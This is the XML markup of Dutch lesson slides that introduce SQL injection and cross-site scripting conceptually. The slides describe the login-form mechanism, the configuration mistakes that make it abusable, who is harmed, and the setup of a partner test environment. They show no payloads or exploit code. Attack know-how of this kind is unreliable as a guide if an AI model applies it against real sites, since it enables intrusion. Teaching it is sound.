      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Tekstvak 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1999622" y="4232218"/>
            <a:ext cx="6390640" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ipconfig</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> /flushdns</a:t>
            </a:r>
            <a:endParaRPr lang="nl-NL" sz="2800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Tekstvak 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1999622" y="4901349"/>
            <a:ext cx="6390640" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ipconfig</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> /registerdns</a:t>
            </a:r>
            <a:endParaRPr lang="nl-NL" sz="2800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="208978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6521863" cy="650375"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" b="0" dirty="0" smtClean="0"/>
              <a:t>"SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" b="0" dirty="0" err="1" smtClean="0"/>
              <a:t>Injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" b="0" dirty="0" smtClean="0"/>
              <a:t>" attack</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1026" name="Picture 2" descr="Afbeeldingsresultaat voor web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7"/>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rgbClr val="FF0000"/>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12281" y="5049838"/>
            <a:ext cx="4211573" cy="1477328"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFC000"/>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t>De hacker maakt gebruikt van configuratie-fouten in de webpagina en database om malafide commando's op de database af te vuren.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>de impact kan gigantisch zijn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="nl-NL" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2054" name="Picture 6" descr="Afbeeldingsresultaat voor hack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420" y="3359155"/>
            <a:ext cx="909429" cy="909429"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="52" name="Tekstvak 51"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9682480" y="1817993"/>
            <a:ext cx="2312105" cy="2308324"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FF0000"/>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Benadeelden</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>alle gebruikers van de website.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>het bedrijf achter de website </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>enorme</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>financiële-en imagoschade</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="nl-NL" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1532074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"Cross Site Scripting (XSS)" attack</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1026" name="Picture 2" descr="Afbeeldingsresultaat voor web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7"/>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rgbClr val="FF0000"/>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12281" y="5049838"/>
            <a:ext cx="4211573" cy="1754326"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFC000"/>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t>De hacker maakt gebruikt van configuratie-fouten in de webpagina en het gedrag van browsers om vooral te klieren</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>de impact kan domweg vervelend zijn. Het is wat lastiger om echt schade te berokkenen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="nl-NL" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2054" name="Picture 6" descr="Afbeeldingsresultaat voor hack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420" y="3359155"/>
            <a:ext cx="909429" cy="909429"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="52" name="Tekstvak 51"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9682480" y="1817993"/>
            <a:ext cx="2312105" cy="2031325"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FF0000"/>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Benadeelden</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>alle gebruikers van de website.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>het bedrijf achter de website </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>imagoschade</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="nl-NL" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2892300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principe</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t>SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" err="1" smtClean="0"/>
              <a:t>injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" err="1" smtClean="0"/>
              <a:t>hacks</a:t>
            </a:r>
            <a:endParaRPr lang="nl-NL" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t>testomgeving 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1283286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p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1162311" y="4265341"/>
            <a:ext cx="5053252" cy="1401538"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Stroomdiagram: Document 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6190577" y="2109009"/>
            <a:ext cx="5886525" cy="2802648"/>
          </a:xfrm>
          <a:prstGeom prst="flowChartDocumen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7776232" cy="650375"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" b="0" dirty="0" smtClean="0"/>
              <a:t>Het gebruikelijke mechanisme</a:t>
            </a:r>
            <a:endParaRPr lang="nl-NL" b="0" dirty="0"/>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principe</a:t>
            </a:r>
            <a:endParaRPr lang="nl-NL" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Afbeelding 6"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="11708793" y="0"/>
            <a:ext cx="483207" cy="288874"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="30" name="Rechte verbindingslijn met pijl 29"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="1572226" y="3910352"/>
            <a:ext cx="4527123"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p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="8223345" y="3557937"/>
            <a:ext cx="1" cy="1987931"/>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Tekstvak 27"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="622996" y="5698701"/>
            <a:ext cx="5325627" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFC000"/>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t>Een gebruiker vult een formulier in en stuurt deze naar een webserver. In dit geval gaat het om twee invoervelden: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>naam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t> en </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>password</a:t>
            </a:r>
            <a:endParaRPr lang="nl-NL" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="7030A0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="34" name="Picture 2" descr="Gerelateerde afbeel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88480" y="3113917"/>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6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1572225" y="2141012"/>
            <a:ext cx="4002105" cy="1516587"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Rechthoek 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1778558" y="4190163"/>
            <a:ext cx="2431701" cy="361740"/>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7" name="Rechthoek 36"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3818122" y="4627081"/>
            <a:ext cx="1075426" cy="209398"/>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3" name="Rechthoek 42"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4543276" y="4852379"/>
            <a:ext cx="1405347" cy="209398"/>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2" name="Afbeelding 11"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6215563" y="2613128"/>
            <a:ext cx="5861539" cy="752801"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="48" name="Tekstvak 47"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7934407" y="2141012"/>
            <a:ext cx="2947958" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>LOGINCONTROLE.PHP</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="49" name="Tekstvak 48"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8656416" y="3467154"/>
            <a:ext cx="3371838" cy="2862322"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFC000"/>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t>In een normaal scenario zal een brave gebruiker een naam en password invoeren.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="nl-NL" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="7030A0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Een hacker probeert iets anders. Deze probeert de invoer zodanig te maken dat de query iets onverwachts doet, iets waarmee de hacker zich toegang tot gegevens kan verschaffen.</a:t>
            </a:r>
            <a:endParaRPr lang="nl-NL" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="7030A0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1030" name="Picture 6" descr="Gerelateerde afbeel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2484" y="5662566"/>
            <a:ext cx="858918" cy="85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38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troomdiagram: Document 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6190577" y="2109009"/>
            <a:ext cx="5886525" cy="2802648"/>
          </a:xfrm>
          <a:prstGeom prst="flowChartDocumen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7776232" cy="650375"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" b="0" dirty="0" smtClean="0"/>
              <a:t>Het gebruikelijke mechanisme</a:t>
            </a:r>
            <a:endParaRPr lang="nl-NL" b="0" dirty="0"/>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principe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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="30" name="Rechte verbindingslijn met pijl 29"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="1572226" y="3910352"/>
            <a:ext cx="4527123"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p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="8414461" y="3557937"/>
            <a:ext cx="1" cy="1987931"/>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Tekstvak 27"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="556826" y="4366421"/>
            <a:ext cx="5325627" cy="1754326"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFC000"/>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t>Dit mechanisme is te misbruiken als de volgende fouten zijn gemaakt door het web team:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="nl-NL" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>De input wordt slecht gereguleerd en nauwelijks gecontroleerd</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="nl-NL" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>De query is te zwak opgesteld</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="nl-NL" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>De database is niet goed geconfigureerd</a:t>
            </a:r>
            <a:endParaRPr lang="nl-NL" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="7030A0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="34"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8480" y="3113917"/>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1572225" y="2141012"/>
            <a:ext cx="4002105" cy="1516587"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="Afbeelding 11"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6215563" y="2613128"/>
            <a:ext cx="5861539" cy="752801"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="48" name="Tekstvak 47"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7934407" y="2141012"/>
            <a:ext cx="2947958" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>LOGINCONTROLE.PHP</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1030" name="Picture 6" descr="Gerelateerde afbeel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0580" y="5698701"/>
            <a:ext cx="858918" cy="85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12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b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>testomgeving 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37889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Test opstelling maken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a:t>: testomgeving opzetten/bekijken</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Stap1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
              <a:t> : Maak onderstaande opstelling samen met je partner</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solidFill>
                <a:srgbClr val="FF0000"/>
